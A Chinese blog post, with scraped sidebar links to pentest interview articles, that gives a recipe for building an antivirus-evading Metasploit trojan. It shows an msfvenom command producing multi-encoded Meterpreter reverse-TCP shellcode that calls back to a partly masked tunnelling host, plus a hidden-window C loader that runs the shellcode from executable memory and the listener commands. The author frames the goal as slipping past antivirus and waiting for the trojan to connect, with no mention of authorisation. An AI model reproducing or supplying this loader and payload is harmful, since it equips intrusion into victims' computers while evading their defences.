兄弟们,你们天天吊打面试官,面试官很难受啊。 metasploit免S客户端

最新推荐文章于 2024-04-03 09:36:59 发布
最新推荐文章于 2024-04-03 09:36:59 发布
阅读量129 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35771144/article/details/105782225
版权

  metasploit生成的exe文件很小,但是免杀效果不行, 找了很多资料, 只有生成c语言shellcode,然后c#重新编译, 这种免杀效果,挺让人满意的

  首先需要生成客户端,客户端使用了ngrok内网穿透, 参考 :https://www.cnblogs.com/diligenceday/p/11009759.html

root@kali:~/Desktop/sunny# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 14 lhost=freXe.idcfXXye.com lport=10068 -f c

  将生成的shellcode替换到一下代码, 然后使用vs重新编译:

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//不显示窗口
#include <stdio.h>
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <memory>
#include <memory.h>

unsigned char buf[] = "xxxxxxxxxxxxxxxxxxxxxxxxxxxx";void main() {

    PVOID pAddr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    memcpy(pAddr, buf, sizeof(buf));

    ((void(*)())pAddr)();

}

  完美过免S, 舒服了

   监听本地端口

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 8000
exploit

  坐等小马上线

参考:

https://www.freebuf.com/sectool/118714.html

sqqihao_dili
关注
Metasploit 客户端漏洞利用实战
悦分享
11-28 917
客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。使用Metasploit执行客户端攻击的方式有很多种,我们将在这里演示其中的一些方法。
2024年最新【MSF】Kali最强渗透工具之Metasploit_kali metasploit(2),网络安全面试选择题
最新发布
2401_84267735的博客
05-06 648
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。学到这报一丝,还是没能成功,渗透攻击有可能成功也有可能失败,漏洞在不断修复之中,对于我这个刚开始学渗透的小白来说真是路漫漫其修远兮啊~此处安装的是windows7 64x虚拟机,使之与kali虚拟机在同一网段中,即两台虚拟机能够互相ping通。程,涵盖了95%以上网络安全知识点,真正体系化!
Centos Linux下使用Metasploit渗透android,移动端静态网站开发
m0_65511857的博客
12-26 606
-p, --payload 使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。 LHOST ip地址 LPORT 自定义端口(注意,那些所谓的防火墙全踏马都要关闭,记得端口要放行且没被占用,不然渗透没软用) ![](https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWcyMDE4LmNuYmxvZ3MuY29tL2ktYmV0YS83OTIzNjEvMjAxOTEyLzc5MjM2MS0yMDE5MTIwNzE2M.
260道网络安全工程师面试题(附答案)
admin_man的博客
07-14 1万+
由于我之前写了不少网络安全技术相关的文章和回答,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人私信问我
100道渗透测试工程师面试题(附答案)
jennycisp的博客
04-03 1943
2024年已经快过去一半了,不知道小伙伴们有没有找到自己心仪的工作呀。最近后台收到不少小伙伴说要我整理一下渗透测试的面试题,今天它来了!
渗透测试常见的面试
qq_52072846的博客
04-14 4357
拿到一个待检测的站,你觉得应该先做什么? 收集信息:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说 通过站长之家收集域名whois通过nmap 御剑查找服务器系统版本 通过google hack 进一步探测网站的信息 通过google hack 和钟馗之眼查看一些敏感信息,用awvs进行漏洞扫描 mysql的网站注入,5.0以上和5.0以下有什么区别? 5.0以下没有information_schema这个系统表,...
Metasploit's Guide
07-19
Metasploit是一个功能强大的渗透测试框架,它简化了发现、利用和分享漏洞的过程,让渗透测试工作更加迅速和简单。尽管Metasploit被全球的安全专业人员广泛使用,但对于初学者来说,它可能还是难以掌握。《Metasploit...
mad-metasploitMetasploit自定义模块,插件,资源脚本和很棒的metasploit集合
02-22
Metasploit自定义模块,插件,资源脚本和超棒的metasploit集合 惊人的 打开 将mad-metasploit添加到metasploit框架 配置您的metasploit-framework目录 $ vim config/config.rb $metasploit_path = '/opt/metasploit-...
Metasploit The Penetration Tester’s Guide.pdf
06-27
Metasploit The Penetration Tester's Guide, This book is designed to teach you the ins and outs of Metasploit and how to use the Framework to its fullest.
300道网络安全工程师面试题(附答案解析)冲刺金三银四
yinjiyufei的博客
12-26 1564
300道网络安全工程师面试题,帮助大家在金三银四中斩获心仪的offer!
MSF - 漏洞利用 相关面试
安全界的彭于晏的博客
06-24 581
1. 搭建测试环境的作用是什么? 在本地测试漏洞,然后授权的情况下进行相关漏洞挖掘 2. PHPstudy的作用是什么? phpstudy是一个快速搭建网站的环境的程序集成包,帮助我们搭建php站点非常方便。 3. PHPstudy只能搭建PHP站点么? 不仅仅,还能搭建jsp的,不过我们要下载jsp版本的。官网:www.phpstudy.net 4. 在使用phpstudy的过程中一般会用到那些问题? 很多,例如端口占用等等的情况。老师找了一个官方的回答帖子, 同学们可以看下。
一套实用的***测试岗位面试题,你会吗?
weixin_33827731的博客
04-11 1749
本文内容大部分转载自Mrxn's Blog,仅作少部分修改。1.拿到一个待检测的站,你觉得应该先做什么?收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...2.mysql的网站注入,5.0以上和5.0以下有什么区别?5.0以下没有information_schema这个系统表,无法列表名等,只能...
渗透测试高级面试
fzx_hsaj的博客
02-13 1万+
1 应用程序开发过程中,下面那些开发习惯可能导致安全漏洞?() A 在程序代码中打印日志输出敏感信息方便调式 B 在使用数组前判断是否越界 C 在生成随机数前使用当前时间设置随机数种子 D 设置配置文件权限为rw-rw-rw- 答案:AD 解释: A 为日志包含敏感信息,容易泄露账号密码接口数据等信息,可能产生安全漏洞。 B 为数组大小问题,数组不越界,可防止溢出安全漏洞。因此是安全的。 C 用...
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
Metasploit 原理 使用
煮酒闲谈
08-13 3715
About Metasploit____________________________________________________________________________________________________________________________________________-Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问
metasploit 初学(一)
热门推荐
小山岷的专栏
11-24 2万+
每个人都有死穴,在武侠片中经常可以看到,点到某人死穴,轻者此人被控、武功被废,重则当场瘫痪或毙命。可以参考武侠片各种大侠。 对于系统而言,存在有或多或少的漏洞,而这些漏洞则很容易被攻击者利用,并成功渗透入主机。 只有了解如何渗透,才能进行反渗透。 metasploit是渗透测试很流行的工具,最近开始记录学习metasploit的过程: 一 安装: 1 对于64位系统: wget h
网络安全渗透面试
08-09 2152
常规渗透 渗透测试有哪几阶段?@whereistehnarwhal, reddit 风险评估、漏洞评估和渗透测试之间有什么区别?@whereistehnarwhal, reddit 运行 nmap 扫描时,指定从哪个源端口扫描,通常可以绕过防火墙规则?@jstnkndy 写一个 Nmap 命令,要求使用 SYN 扫描,它不进行 DNS 查找,不 ping 主机,只返回 tcp/139...
MSF后门生成模块 面试考题
安全界的彭于晏的博客
06-24 301
1. 后门生成模块的作用是什么? 维持访问,持续控制 2. MsFvenom支持生成的脚本有哪些? 使用命令:MsFvenom -l formats查看支持的脚本列表 3. 如何查看msfvenom支持的payload? 使用命令:msfvenom -l payloads查看支持的payload 4. 如何查看msfvenom支持的编码器? 使用命令:msfvenom -l encoders查看支持的所有编码器 5. Msfvenom -b 参数的作用是什么? 删除生成sh
2019渗透测试面试题精粹
资源摘要信息:"本资源包含了针对渗透测试职位的面试题,适用于2019年的面试环境。渗透测试是一种安全测试方式,主要是通过模拟黑客攻击,以评估计算机网络或系统的安全性。这类面试题目主要考察应聘者在网络安全领域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值